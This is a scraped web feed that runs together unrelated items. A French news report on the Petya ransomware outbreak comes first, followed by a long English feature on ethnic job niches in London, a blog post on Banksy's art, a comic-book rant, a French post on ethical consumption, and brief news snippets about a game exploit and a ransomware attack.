C'est une nouvelle menace informatique qui pèse sur les entreprises et les particuliers. Petya est un « ransomware » qui prend les données d'un PC en otage, et ne les libère qu'en payant une rançon en bitcoin.
Le ransomware Petya demande une rançon pour libérer les données d'un PC infecté
Cette rançon se monte à 300 $, à régler avec la fameuse devise cryptée. Cette cyberattaque a d'abord frappé la Russie et l'Ukraine, avant de s'étendre au reste du monde, tout particulièrement en Europe et en Amérique du Nord. Plusieurs grandes entreprises, comme Saint-Gobain en France, le géant pétrolier Rosneft en Russie ou le groupe de publicité anglais WPP Group ont été touchés à plus ou moins grande échelle.

Pour ce qui concerne la France, une enquête a été ouverte tandis que les autorités appellent à la plus grande prudence — et s'il le faut, à isoler du réseau  les PC qui pourraient être infectés. Elles conseillent aussi de ne rien payer car les pirates pourraient ne pas donner la clé qui déverrouillerait les données. C'est une fois encore les ordinateurs sous Windows, et en particulier les plus anciens encore en fonctionnement, qui sont visés. Bien souvent, les utilisateurs de ces PC n'appliquent pas ou plus les mises à jour de sécurité, laissant les machines sans défense face à ce type de menaces.

Il y a quelques semaines, c'est un autre de ces « rançongiciels » qui faisaient parler de lui : WannaCry. Là aussi il fallait payer une rançon pour récupérer les données de son disque dur. Un développeur anglais avait alors pu stopper nette la propagation de ce virus. Petya, qui exploite les mêmes failles que son prédécesseur, semble lui bien plus virulent. 


          Multiculturalism at work   

Charing Cross Road, a heaving mass of punters, tourists and ambling drunkards flows past Samuel's workplace at its usual frenetic, clogged pace, until one of its number dislodges himself. An ambling drunkard. He sports baggy pants, a loose striped jacket and a whiskery, unkempt beard. He shouts at Samuel to the rustle of a plastic Waterstone's bag. "Fuck… eh, you….you… what are you doing?" "What!" Samuel stays back, keeps cool. The abuse runs in thick streams, words can barely be made out. Curious shoppers stare wildly over their issues of Zoo and The Economist. The man is black; Samuel is black too. "Fou!" Is it French? Red-eyed, mouth agape, the man keeps screaming, grabs his bag and plunges back into the crowd. Punters dive back into their torrents of headlines, semi-nudes and Harry Potter blurbs at the Borders storefront. Samuel resumes his lax position at the reception, wistfully contemplating the crowds.

Charing Cross Road is the pulse of multicultural London, an artery of pleasure, strife and boredom, snaking from the imperial grandeur of Trafalgar Square to the heart of Oxford Street. Its pedestrian flow makes a garish display; multicultural, festive and sweaty. Almost half of the UK's ethnic minorities live in the capital, clustered in villages: Jews up Golders Green, Cypriots in Haringey, Arabs at Edgware Road and hip white things in Islington. Charing Cross road is where they meet, shop and scuffle: but it is also a place where cultures are put to work. If the now bitterly contested British model of multiculturalism is falling ill, Charing Cross Road is a good place to take its blood pressure.

The security guard

"We don't get too much abuse. We are trained to handle this," Samuel says laconically. No security guard clichés apply to his five foot eight inch frame: no bouncy muscles, towering torso or chiselled face, and only a small corporate insignia on his plain T-shirt indicates he might be at work. Except, that is, for one distinct marker of those guarding the shopfronts and clubs of central London's incongruous geography these days, a marker by now too clichéd to even be noticed by most Londoners: Samuel is black.

"I have been working as a security guard for three years," he says. "You get a lot of junkies in this area. Sometimes you have to be aggressive." Samuel smiles, pushing out his chest a little. "You have to know how to act depending on the person. It's like science – action and reaction." He chuckles ever so slightly.

Samuel comes from Nigeria, as do many others in his profession. His eyes flick back and forth, scanning the throng of people. "You can't stand like this for too long, talking – somebody might just go in, take a pack of CDs and leave," he says. Samuel excuses himself, adding his name and a furtive handshake as an afterthought. Less than five minutes' talk in all.

The private security sector is expanding, and guards now adorn even the humblest of supermarket checkouts and dingiest of clubs. A "visual deterrent" to crime, security companies claim. And this visual deterrence is increasingly performed by bored-looking black Britons and Africans. The good news may be that black minorities, still two and a half times more likely to be unemployed than white Britons, are now entrusted with security matters, inching a bit higher up London's pecking order. The bad news is that an ethnic furrow is drilled into London's asphalt, channelling black men into badly paid, vulnerable frontline positions.

Politicians, pundits and even the police have often praised the multicultural British model of integration, not without good reason. Nobody will launch into patriotic sing-a-longs or wave a Union Jack in the face of the hookah-smoking, Morris dancing, Qur'an-chanting and sauerkraut-eating masses. But this is all multiculturalism by night. Multiculturalism also works – works hard – up Charing Cross Road, down dingy backstreets, at the back of fusty pubs, deep in the cellars of milk-white Kensington hotels, under the sterile bulbs of NHS surgeries.

It may be insolent to heave another load of real-world grit onto multiculturalism's back at this time of trials by government, racism and terror. But dreary work is the flipside to London's multicultural project. Black bouncers, Asian shopkeepers, African parking attendants, Polish bartenders, Spanish chambermaids, Irish builders, African nurses, Indian doctors – they all come to London and find their place, as if by serendipity, from £4.85 an hour and counting. Europe's financial capital is insatiable, spongy, absorbent. But do people pick jobs according to ability and preference, or is the grid already laid out for them; colourful, deceptive and non-negotiable as a London tube map?

The parking attendant

Like security guards, parking attendants are too busy for a chat. Brisk, outsourced, undaunted, they roam the capital's grimy single yellow lines armed with just an oversized machine to crunch number-plates and a council vest against cold winds and the evil eye. And they are virtually unstoppable, furtive figures.

"I am too busy, don't have time," says my first interview target, a stern black parking attendant. He walks off briskly, escaping the lunging white hack. Luck comes in the voluminous shape of a fast-paced black woman negotiating a Camden sidestreet. Her vest is deceptively branded with a comforting council-green dye that blends with a minuscule NCP insignia – the private, nationwide parking venture that won Camden Council's lucrative enforcement contract in 2001.

Is this one of London's toughest jobs? "No, it's not that hard!" she chuckles, scanning a white van's pay-and-display ticket. She treads along briskly. "Really, it's OK," she assures me. "In the beginning it's harder, but you get used to it. The abuse comes daily, of course. It's not the job for you if you can't handle abuse. But if you know you are doing the right thing, it's OK. You just walk away when they start shouting."

She is matter-of-fact, stout and cheerful, her hair sculpted into a bun. I tag along, barely keeping up. Is she running away from her stalker? What's her name? "You can call me this!" she chuckles again, pointing to her shoulder cuff. It says 1571. "I am not allowed to say my name. Here I am a number – my name doesn't matter." 1571 looks busier and busier. The radio crackles. Where is she from? "Nigeria." Why do so many Africans do this job? "Oh, I don't know," 1571 says, curtly or just briskly. We reach the end of the block, another grey Camden thoroughfare beckons beyond, with a neat stack of pay-and-displays. She is speeding – wait … too late. 1571 chuckles, says goodbye. A colleague approaches – could be her cousin: hair neatly wrapped, fast-paced, African features. Then a male colleague – black, African traits. One, two, three, all heading down the same street, an avalanche of attendants … And my failed source, pacing briskly as ever. But now he smiles. "So, you found somebody?" His accent, too, is African.

No job evokes such hostility as parking enforcement, more so since public-private partnerships and new profit-making incentives began unleashing a ticketing bonanza on the capital's streets. But London's parking business has been doubly outsourced: to private ventures and flak-catching Africans, who have relentlessly populated the payrolls. At the public-private faultline they teeter, armed with silly hats and plastic machinery, come rain or shine or saliva-spattering owners of four-by-fours.

Enforcing London's rules and patrolling private property are tough tasks, but somebody's got to do them. Not to worry: multiculturalism assigns the posts. Please tick the ethnic monitoring form and wait in line. If you tick "black", the chance is you will soon find your place within London's hard-working, visually deterring foot soldier community.

Who's doing what – A rough guide to working Britain

4.3 per cent of Pakistanis work as shopkeepers, wholesale and retail dealers, compared to 0.5 per cent of white Britons

4.2 per cent of Indians work as medical practitioners, compared to 0.5 per cent white Britons

16 per cent of Bangladeshis work as chefs, compared to 0.7 per cent white Britons

11.3 per cent of Bangladeshis work as retail assistants, compared to 6.3 of all Asians and 4.5 of whites

2 per cent of Asians work as cashiers or checkout operators, compared to 1.1 per cent of whites

9.4 per cent of Pakistanis are chauffeurs or cab drivers, compared to 0.5 per cent whites and 0.9 per cent of blacks

8.5 per cent of black Africans are nurses, compared to 1.7 per cent whites, few South Asians and 11.2 per cent of "other Asians"

3.6 per cent of black Africans work as security guards, compared to 0.5 per cent of whites

Approximations based on data from the Quarterly Labour Force Survey, December 2004 – February 2005. Ethnic minority data is unreliable due to sample size.

The shopkeeper

Aftab huddles behind a desk cluttered with weekly glossies, breath mints, KP nuts and 2p sweets, the radio filling his shop with muted noise. "Violence is not the solution," he sighs, referring both to the still recent 7 July London bombs and Iraq. On a shelf by the open door, a four-year-old copy of The Economist peeks out next to a gaudy selection of lads' mags. "The day the world changed", its front page trumpets, to the dust and fumes of Manhattan. "It reminds me of when it all started," Aftab says softly.

His cornershop is set in the shadow of thronging, roaring Camden Town station. Aftab comes from Pakistan, or rather, Kashmir. "Ever since Pakistan was created out of the British Empire in 1947 by [Muhammad Ali] Jinnah, it has failed to reconcile the different nations within its borders. It's an artificial creation. Actually, there are only two countries in the world created on the basis of religion: Israel and Pakistan," he says, bemused. "Their borders are a colonial legacy."

Since coming to Britain in 1997, Aftab has become the hub of a local community made up of itinerant builders, international students, crackheads, Bangladeshi shopkeepers and working-class families. He knows everybody. "My brother was running the shop when I got here, then he fell ill. I started coming to the shop, reading four-five papers a day: that's how I got to know all the people around here." He has braved shoplifters, stinkbombs and random yobbery, and recently appeared on the BBC after launching a petition against drug-related crime.

Aftab holds a Masters in Sociology from the University of Karachi. "When I came here they told me that if you have a Third World qualification, you need to get a diploma in this country," he says. "The Job Centre is just there to give you your £52 a week in benefit, and then you're off. They don't help you find jobs. I was registered there for two years, and scanned job offers all the time. At one point I said, 'please, just give me anything!' I told them I could study for a diploma to complete my qualifications, but they weren't interested. Then I started to get more involved here." He still wants to study a Masters of Science in Human Rights.

Has he felt discriminated against? "No, it's the same for everyone." He smiles. I ask him why he thinks so many Asians have set up shop. He looks unsure, and eventually produces a bit of sociology. "When migrants first started arriving here, many were uneducated and set up shops and have continued since then. But their children often prefer to go looking for employers. With Sainsbury's and Tesco opening local stores, the cornershop is becoming a thing of the past."

In this "nation of shopkeepers", shopkeeping has been subcontracted to that old imperial safeguard of the nation's values, British Asia. Small-scale entrepreneurs of Indian or Pakistani extraction have absorbed the retail function, running cornerstores as well as staffing supermarkets, high street stores and bank counters. They are not alone, of course: Turkish Cypriots have carved a clothes-and-food niche out of north London. But Asian shopkeepers are the only group with full-spectrum dominance, from Haringey to Hampstead. However their market share is increasingly threatened by supermarkets that wedge their slick Express, Local, Metro and Central chains into minuscule urban spaces. Does that leave you, or your kids, unemployed? Please tick the "Asian" box, and be patient: the chance is you will be handling supermarket tills, sorting ballpoint pens in a stationers, or stacking crates before you know it.

The supermarket assistant

Feronda pauses from stacking tins and dons a sincere, expectant grin worthy of the glossiest of Corporate Social Responsibility reviews. He is happy with his job as a Sainsbury's customer assistant. "I'm from Sri Lanka. I'm a refugee. Only I and one more are from Sri Lanka in this shop – most of the other people here are Pakistani." Actually, all the other customer assistants seem to be Brits of Pakistani background. Even the security guard is Asian. Why does Feronda think this is so? "Oh, this I don't know," he says, tugging his grin along, keen to move on to the next question. "I like it here, I want to stay – I especially enjoy being on the shop floor. Before I worked for four years as a car mechanic up the road," – he waves past pea cans, north – "doing night shifts. That was very hard." Now he works 3-11pm, five days a week, at £6 an hour. "Let's see… about £850 a month for a 39-hour week," he says. He looks thrilled, grateful. Before coming to the UK he studied computers, but struggles to translate his education into British levels. "I didn't apply for any other jobs – just this," he says. But is there anything he doesn't like about the job? "No, no," he says, with the sparkling grin making a lingering plea for mercy. The largely white Chalk Farm clientele scavenges for breakfast bagels and tender-stem broccoli. Feronda's colleagues shuffle past, aisle-wide looks in their eyes.

Whether British supermarkets' workforces are as diverse as their stock of curries, mozzarella and stodgy German bread is hard to ascertain – their statistics slip from your hands like salmon. Fourteen percent of Sainsbury's employees and three to four percent of its managers come from ethnic minorities: more detailed figures are not available from either Sainsbury's or Tesco, despite their equal opportunities policies.

Sainsbury's prohibits discrimination and strives to "move beyond simple legal compliance," according to Cheryl Kuczynski, a spokeswoman. "We actively look to employ colleagues who reflect the diversity of our customers," she says. Tesco, the behemoth of the British food market, says targets have been set to get so-called "ethnic groups" into managerial positions. Flexible work during Ramadan and Diwali and briefings in languages like Hindi, Urdu, and Bangladeshi are two selling points. All according to its Corporate Social Responsibility review.

Katie Jenkins, Tesco's employment spokeswoman, says that diversity "creates a great atmosphere in stores" and makes everybody contribute with different skills and knowledge. "Retail is a fast-paced environment, so we look for people who can adapt well to change, people who are very customer-focused. The stores reflect the demographics of the local area. It is about recruiting local people into local jobs."

In lush white Hampstead, amid the cobblestones, blonde beer, Unitarian churches, window displays of pains au céréales and fragrant Jojoba oils, lurks an unbecoming Tesco Express. Inside, Jayvishal is morosely stacking boxes of vegetables. "I can't do an interview if it's going to take time," he warns. I try an optimistic note. What does he like most about his job?" "I don't like it at all," he says, his slightly pained face sloping down into an unlikely smile. "It's hard work, very hard work. Packing all the time."

Jayvishal is from India. "There are not many Indians here – mainly Sri Lankans and some Europeans," he says. By European he must mean British Asian: all the shop's staff look Asian. How did he find this £6-an-hour job? "Oh, through the Job Centre, and then I had some friends over here," Jayvishal answers, somewhat cryptically. "I have been in the UK since 2003, and couldn't find a job for a while. It was very hard. Legally, international students are only allowed to work 20 hours a week, but during vacations I do overtime. It is difficult economically – I have to pay rent, transport and everything, and only earn £500 a month."

Jayvishal is studying a Masters in Business and Finance at London's Metropolitan University. While not in India he lives in Queensbury, zone four, on the Jubilee line that branches through a parallel part – or galaxy, perhaps – of north London. Skills and knowledge he has: a local he is not. The manager, a short-set, trim-bearded man of South Asian features presses up against us, fingering the stack of plastic boxes. Time to retreat. "And when you're finished…" – the orders fade, giving way to wine bars and American ice cream parlours slanting down the north London hillside.

Hampstead is at the extreme end of the spectrum. But a random Monday afternoon headcount at seventeen West End supermarkets, where workers are least likely to be drawn from a residential pool, confirms the ethnic pattern, albeit with minor variations. One hundred customer assistants were of Asian background, fifty-eight were black, nineteen white, and four "other Asians". The eleven security guards on duty were all black but for one.

The bar tender

It would be a mistake to think that low-paid jobs are the reserve of the Queen's post-colonial subjects. Some minorities have fared quite well: ethnic Indians, for one, are now approaching the employment chances of white Britons. Meanwhile, London's pint-pullers earn even less than its shelf-fillers, and a terrifying ninety-seven percent of pub workers nationwide are white. Why?

Perhaps Al Murray's comedy act the Pub Landlord hinted at the answer when saying that there should be no things foreign in a proper English pub, with the natural exception of peanuts. Peanuts are more nondescript than exotic, a bit like the "white other" box on the ethnic monitoring forms. And so it is that Europeans, Australians and their fellow Antipodeans have been swallowed by the fusty land of minimum wages, ruddy-faced regulars and sticky floors.

Behind the bar, a twenty-something lad moves packets of crisps about. Covent Garden's cobbled streets unfold outside. "Cleaning, cleaning, cleaning all the time," he says, in spotless English. "There's lots of cleaning in this pub." He doesn't look glum at all saying it. The pub is one of a constellation of glinting properties on the online London map of the Spirit Group, one of the UK's biggest pub businesses with over two thousand venues to its name. Boleslaw has worked here since May, and shares the pleasure with a girl from Sweden, another from France, an Irish boss and two other Poles – a friend and the assistant manager. He got his job through the previous manager, also Irish. "That's a traditional English pub for you!" he says.

This is not the first time I come across the Ladder. The Ladder is a peculiar upstairs-downstairs way of ordering the capital's economy. The lower steps of many a London workplace are, predictably enough, dominated by the poor relatives of the world economy: Poles, Colombians and Nigerians abound. But climb one step up, and surprisingly often you will find employees from closer to home: Irish managing continental Europeans, perhaps, or Spaniards managing Colombians. On the top of the Ladder, perch the white English top managers and boardroom staff. The Commission for Racial Equality's (CRE) chairman Trevor Phillips has called it "snow-capping", or white on black: only 1.4 percent of executive management comes from ethnic minorities.

"It's a very hard job and not paid very well. The minimum: £4.85," Boleslaw continues. No big deal. This is his third bout of pub work in London. "At least this is a very nice area, with lots of theatres around." Nice areas make customer flows impressive, and it's hectic, lager-churning madness. "After a while you get used to it – even if it's packed you can listen to the music and chat up a girl. But you work till late and don't have time for yourself. You wake up at nine or ten next morning and start work at 12. It's like a full circle." He smiles. "If you get some days off, you just chill upstairs," he adds, pointing heavenward. Boleslaw and his colleagues sleep upstairs: it's a live-in pub.

Despite paying rent to his landlord-bosses, Boleslaw can save "a few hundreds" each month, he says. He is a graphic designer and photographer, a graduate of Poland's Academy of Fine Arts, and has worked for advertising agencies back home. "It's a dodgy job market in Poland, simple as that," he says, unapologetically. "The UK market is more stable. You can do bar work for a while, then start looking around for what you really want to do."

A man with entourage orders pints of Tetley and pork scratchings. A colleague shows up, and Boleslaw breaks into Polish for a few sentences, cackling until the colleague disappears into the sunshine.

What do his fellow Poles do in the capital these days? "Any job you can get," he says. "Normally, guys who are tough enough go work on building sites, but others go into these jobs. The guy who just left, for example, is a doctor." A doctor? "Yeah – it's easy to find them working in pubs. We got lawyers, we got doctors, graphic designers, actors, the lot. This country has got the most educated bar staff ever," he says cheerily, pouring pints of Guinness for a couple of Koreans. He has only applied for one graphic design job so far, and saves his pounds with determination. "I felt I had too good qualifications. They looked at my portfolio and said 'you're too good, you better go somewhere else'. When the time comes, I'll do it."

Years back, London's fleet of theme pubs, Irish pubs, local pubs and all the other concept and brand name pubs shop-fronting for Japanese investment banks were manned by cheery mates from Down Under. The Anglo-Saxon reaches of empire supplemented London's homegrown working class with much-needed building and boozing skills. Aussies and Kiwis provided the pint-pulling crowd. South Africans joined the Irish on the building sites. The Working Holiday Visa kept the children of the Commonwealth snuggled on old England's beer belly for years.

But in 2000, New Labour sowed the seeds of a revised migration strategy, which has blossomed into today's demand-based, quotas-and-points approach. Working Holiday rules for Commonwealth countries changed in 2003, and Antipodeans have moved into administration, computer work and public services with the easing of job-type restrictions. Poles are entering the pub-and-scaffolding race, quickly filling their predecessors' place. Some 98,500 Poles had applied for Britain's worker registration scheme in May 2005, over half of all new east European hopefuls arriving in the wake of 2004's EU expansion. Eighty percent of them earned up to £5 an hour.

The arrival of Poles is changing the demographic makeup of other parts of London's service economy, too. José Vigo, employment adviser, senses a growing fashion for east European employees at his West End Job Centre, which specialises in low-paid hotel and catering vacancies "that have not been taken through the domestic labour market".

Southern Europeans and Latin Americans, often over-skilled but with poor English, have peopled the lower reaches of London's job market for years, where a dank stereotype of the Latin service worker has grown. A recent Job Centre language survey confirms the lingering Mediterranean makeup of London's catering and hotel trades: Spanish clocked in as first language, followed by Portuguese, French and Italian – but with upstart Polish wedged in at third place.

Statistics are scant and unreliable and the turnover ferocious, but Vigo confirms that employers now head for eastern Europe rather than scavenging the Iberian soils for catering and hotel staff. "There they get better levels of English and people willing to do that kind of job."

The service sector is likely to continue haunting southern European visitors, however. "London is still one of the most popular places in Europe for young Spaniards," says Manuela Martínez, adviser for EU employment network Eures in southern Spain. "People want to master English and make their CVs look better. But if their level of English is low, they will work in places where they don't deal with the public, in 'backstage' jobs. They end up spending a year in London and bring back three or four words related to the hotel trade. Then, naturally, they only tell people about the good things that happened, and the process starts snowballing."

The backstage jobs of London's fickle service economy have a convenient feature: as Portuguese hotel workers, Spanish chambermaids and Latin American kitchen porters mingle in their trade, they speak Spanish instead of English. And the less English they speak, the more likely they will languish in their underpaid niches. London keeps luring job-hunters into its wide nets, its finance-fuelled economy selects and cherrypicks the candidates, and multiculturalism keeps them apart, blissful in their ghettoes.

The state's story

Government departments are blissful in their ghettoes, too, and keep chucking the ball out of their own ponds. The Department for Work and Pensions (DWP) does not target specific ethnic groups, says Ben Lloyd, a spokesman, who suggests I try the Department for Trade and Industry (DTI), which deals with safeguarding employees' rights. And what does the DTI think? A spokesperson mentions Tony Blair's 2003 cross-departmental Ethnic Minorities Employment Task Force, but little more: the DWP is wrong – "we don't deal with getting people into jobs."

Academia is also suffering from a "paucity of research" on ethnic recruitment according to Dr Sophia Skyers, senior research fellow on the London labour market with the public interest company Office for Public Management (OPM). She explains ethnic niching in relation to London's expanding knowledge economy. "We are seeing a polarisation of the labour force into, on the one hand, high-paid jobs in professional and financial services and, on the other hand, retail, protective services and other personal services like healthcare," she says. "What we get is a pattern of occupational segregation – a lot of people are forced into particular employment groups, often because of discrimination in other sectors. The stereotype goes with the job, and sticks to the people who get these jobs."

Professor Michael Hardt, co-author of the watershed tome Empire about how power has been redistributed in a globalised world, agrees that multiculturalism plays an economic role in the new economy. "Britain's multicultural model can facilitate an ethnic division of labour, a model that has perhaps a longer history in the Americas," he says. "Racialized hierarchies and exploitation do not always function along the old or assumed models of exclusion. But it's worth insisting that recognizing that cultural diversity can be part of a new scheme of exploitation does not mean we should be against cultural diversity as such. What we need to strive for is equality and freedom within this multicultural society."

Trevor Phillips has criticised multiculturalism for keeping people apart, labelling it "a typically British way of dealing with difference". But now the stakes are higher. While London Mayor Ken Livingstone praised multiculturalism in the wake of the 2005 London bombings, Tony Blair announced a crackdown on Britain's permissive liberal consensus to a chorus of tabloid approval. But even multiculturalism's defenders often have little clue of what it really is, or does. Multiculturalism is not only a heap of colours, it is a machine with cogs that whirr. It not only fuses, but keeps apart. It doesn't so much discriminate as direct a choreography of cultures. Much like a latter-day, benign sort of empire, where all races and cultures play a minor part in the symphony of power.

On the ring road again

Your no-frills flight descends among thick nighttime clouds and your bags emerge from the bowels of Stansted airport. Now it's business the British way. Bearded Muslims, lavish Iberian girls and red-nosed Brits clutching Su Doku books mingle in the halls and tow their luggage into the rainy night, stared on by billboards vying for their London fare. Outside, hordes of many-accented hustlers flog £5 one-ways for cheap airbus upstarts. Beyond the Pink Elephant car park waits the National Express. A stream of people crosses the wet asphalt, oblivious to the hustlers' calls. This is how multicultural London commutes, in and out of London, twenty-four hours a day, every fifteen minutes.

Chris descends from his bus and lights a quick fag before his next drive. "The job is not as stressful as it looks," he says. "It's easy, and the pay's quite good. £22,000 a year because I do night shifts." He cuts a stoic figure, tall and bulky, his shaved head pinched by an earring. His colleagues, like him, are overwhelmingly white, bald, and big, emblems of the well-fed English working class. They ferry multiculturalism in and out of the capital. What do the people boarding his coach to the throbbing financial hub of Europe do, then? "Well," Chris puffs on his fag, thinks. "We carry a lot of students, some come over on a gap year, a small portion are on business and the bulk of them are tourists and sightseers."

What about the workers? Where are they? Who notices the shelf-stacker in the business student, the pint-puller in the graduate, the cornershop owner among the businessmen, the sandwich wrappers, cappuccino steamers and doormen among the tourists? Not Chris, not Ken, not Tony, nor Middle England or the City elite. The City: white as a scrubbed cathedral wall, home of offshore dollars and high-value bonds, generator of the service economy and its guards, attendants, retailers, cleaners, drivers. And Chris, where does he live? "I live in Haverhill, outside Cambridge," he says, stubs out his fag, and sets the motor purring towards the M25.


          Art as Prophetic Subversion   
banksy_christI have already stated emphatically that art is good simply because it is creative. Art glorifies God simply by being imaginative and original. Art’s value is not based on its instrumentality or on its commercial value. What proceeds below must not serve to undermine this foundational assertion: Good art is good art; it glorifies God “as is.”

Beyond the inherent goodness in art, there are also other ways that art can bring glory to God. Today we will look at how art can be both creative and prophetic. Tomorrow we will see how art can be redemptive and restorative.

Art can be prophetic, creating critical awareness of injustice, brokenness, oppression, and the need for action to alleviate suffering.
“Using the arts to create critical awareness is not new. In the Old Testament Jeremiah, Isaiah, Amos, and other prophets used drama, allegory, and poetry to jolt people and nations into thinking about their lives in the world. Jesus, by his presence and his storytelling, often confused and angered those around him who did not want to recognize their own role in oppressing the poor. He created critical awareness among the poor by causing them to see and act on the new life of freedom that was possible outside the accepted cultural boundaries based on status, wealth, power, religion, gender, and ethnicity.” (Taking it to the Streets: Using the Arts to Transform Your Community, by J. Nathan Corbitt and Vivian Nix-Early, p. 129)
In the movie, Exit Through the Gift Shop, an eccentric Frenchman Thierry Guetta has an obsession to videotape the secret lives of the most famous street artists as they create their art. Even though he tells the street artists he is making a documentary, he in fact has no ability to do so, he simply collects box after box of unmarked videotapes. In his exploits, Guetta meets many of the most famous street artists in the world, including Space Invader, Shephard Fairey (known for his Andre the Giant stencils and made famous through his colorful Barack Obama posters during the 2008 election) and the most famous and most mysterious street artist of them all, Banksy, whose legendary art mysteriously appears on walls, bridges, and streets throughout the world. All we know of Banksy’s identity is that he is a 30-something male from the Bristol area of England. In the film, Banksy’s face is obscured in black while he wears a hoody as he is speaks to the camera.

Banksy - No_LoiteringBanksy is one of today’s greatest creative geniuses. Most of his art is created through a unique stenciling technique (though he also creates physical props) and these masterpieces are often satirical and subversive, using irreverent dark humor to offer insightful social commentary.
banksy - palestinian wallHis art has appeared throughout the world, including buildings made derelict by Hurricane Katrina (one painting depicted an old man sitting on a rocking chair waving a small American flag under spray-painted words “No Loitering”), the wall that divides Israel and Palestine (where he created nine provocative paintings depicting escape, freedom, and beauty on an object that represents imprisonment and the ugly reality of political faction), and even Disneyland (where he placed a life-sized replica of a Guantanamo Bay detainee next to a roller coaster). When an art museum commissions Banksy to display his art, the museum is vacated while he secretly comes in and installs his art. One of his most provocative paintings depicts Christ crucified, but instead of being on a cross, his spread arms and hands are carrying shopping bags full of Christmas presents. The street prophet is asking us, “What is Christmas really about today? How has commercialization and commodification usurped the real story of Christ?”

banksy-disneylandIn Exit Through the Gift Shop, Banksy realizes that Thierry Guetta is not really a creative artist capable of making the movie and therefore takes over the direction of the documentary. Flipping the script on Guetta, Banksy suggests to the crazy Frenchman to become a street artist himself, which he excitedly does. Guetta takes the alter ego “Mr. Brainwash” and mass-produces street art for a big debut show in Los Angeles.

Banksy successfully transforms the movie into the story of Thierry Guetta, whose only talent is to copy the art of those he admires for commercial monetary success. “Mr. Brainwash’s” show is a success, as people line up and pay a lot of money for pieces of pop-art that are totally derivative of the true street artists.

Bansky’s film shows, through the character of the shallow Guetta, that not all art is authentically creative. Banksy also exposes the desire in our culture to commodify everything, even art.
So, in the film, we get insight into both the creative and the prophetic aspects of art that glorifies God.
Art is art when it is not derivative, when it is done with authenticity, and when it is not subsumed under the weight of commercialization. This is art that is done by image-bearers reflecting the creative imagination of the Creator.

Art can also be prophetic, as exemplified by the work of Banksy, whose subversive creations speak against injustice and unrighteousness. While the authorities paint over his art because they are classified as “defacing graffiti,” Banksy continues his defiant agitation of the status quo.

What would it look like if a new generation of Christians took seriously the task of being subversive prophetic voices in their culture?
          Rant: Mark Millar's Trouble   
There was a lot of hand-wringing and anger when Mark Millar's Trouble first came out a few years ago....some of it justified, mostly not. People were angry because: 

1. The covers featured photos, not the usual drawings, of girls that look like teen girls acting sexy. Although I understand the criticism the photos are less racy than any fashion magazine and, really, than the art in a lot of superhero comics. Plus I think they were going for the whole Gossip Girl crowd.



 

2. The story features teenagers in the early 1960's having (gasp!) sex! Sure, you can call this a bit exploitative but let's face. Teens have sex. Or at least a lot of them do. Plus if you bother to read to the ending you'll see their sexual activities end up having real consequences (pregnancy, hurt feelings, loss of opportunities in life) that they are left to deal with for the rest of their lives. 

3. I think the real reason comics fans reacted so strongly to this is because Millar made this a complicated love mixup romance between May, her friend Mary, Ben and his brother Richard. If those names are familiar to you it's because they are the same names as Peter Parker's (you know, Spider-man) parents and Aunt May and Uncle Ben. Essentially, May cheats on her boyfriend Ben and gets pregnant by Richard, who is Mary's girlfriend. For reasons not worth getting into here friend Mary decides to lie for May and take the child for her own. So not only does it portray Peter Parker's nice old aunt as being a tramp in her teenage years, it also sets her up as his real mother, which all pretty much smacks comic lore right in face. And there's no way to get the ire of the comic book world faster than to write a story that even suggests something different than the known canon of superhero lore. Honestly, I thought it was kind of funny. 

Don't get me wrong. This is not a great graphic novel/comic book series. It's an entertaining older teen romance story  and it reminds me of a lot of the half-baked romance/comedies I grew up with in the 80's like The Flamingo Kid, but it's nowhere near bad. If you want to hate a series, fanboys, get over yourselves and at least hate it for the right reasons.



Excelsior.

          Destiny: Bungie says it intends to fix Sparrow Racing League exploit   
Destiny players have found an exploit pertaining to the Sparrow Racing League Record Book, and Bungie intends to fix it quickly. According to a post on reddit, the exploit allows players to earn rewards from the Record Book without paying the 1,000 Silver to purchase it. “People are simply walking up to Tess, inspecting the […]
          - Et si on se retroussait les manches ! -    

          Petit aparté non cuisinistique... Dimanche 23 avril 2017, on m'a demandé d'aller voter. Sur la petite table du bureau de vote, onze noms alignés sur des bulletins. Onze personnalités en lesquelles il m'était impossible de me reconnaître. Il faut dire que la politique et moi, on est un peu fâchés. Mais ça me pèse un peu plus à chaque élection d'avoir l'impression de ne pouvoir rien faire... Alors j'ai pris une décision, j'ai décidé de voter 365 jours par an. Oui tous les jours, j'ai décidé de voter avec ce qui semble avoir le plus de pouvoir dans ce monde, j'ai décidé de voter avec mon argent. Ne pas faire sauter le système à grands coups de manif et de vociférations, mais le miner de l'intérieur pour essayer de le remplacer dans la douceur ! Si ça vous dit de vous transformer en petits bisounours de toutes les couleurs et de sauter d'arc-en-ciel en nuages moelleux, bienvenue en utopie !

          Concrètement, ça veut dire quoi ? Je vais essayer de trouver le maximum de solutions pour éviter de contribuer au système injuste tel qu'il existe actuellement. On se plaint que les multinationales nous exploitent pour nous refourguer des produits douteux. Ne les achetons plus ! On se plaint que nos agriculteurs n'ont plus de quoi vivre, mais nous achetons nos légumes venant de pétaouchnok au supermarché... On est désolés pour les enfants qui bossent à l'autre bout du monde, mais ils sont vachement pas chers les tee-shirts dans nos boutiques...

          Alors où, comment et à quel prix, changeons le monde ! Commençons par le nôtre, et donnons envie aux autres de faire de même ! Tous dans la joie, la bonne humeur et la gentillesse ! Je vais essayer de mettre en lignes des choses basiques ou élaborées, avec si possible combien ça coûte et où on trouve tout ça ! Si vous avez aussi des idées ou bons plans, n'hésitez pas à m'en faire part en commentaires ou sur la page facebook du blog. N'hésitez pas à partager, au plus on sera de fous, plus vite on y arrivera ! On s'y met ?


          Forum Topic: Massive New Ransomware Attack Hits 64 Countries -    


Users in our security forum discuss the latest, massive ransomware attack that first surfaced in a Ukrainian tax accountancy firm, but has since exploded into more than 64 counties -- and countless homes and businesses -- worldwide. The attack was made possible, in part, by the NSA's hoarding of exploits, notes whistleblower Edward Snowden. »twitter.com/Snowden/stat ··· 94679808





          ‘Just like Hitler’: The diminishing of the Holocaust   
Exploiting the Holocaust for political ends is a dangerous game.
          Les grands exploits sportifs canadiens   
À l’approche des XXIIIes Jeux olympiques d’hiver qui auront lieu à PyeongChang, le moment est tout désigné de se remémorer...
          Nature Slim Tea   
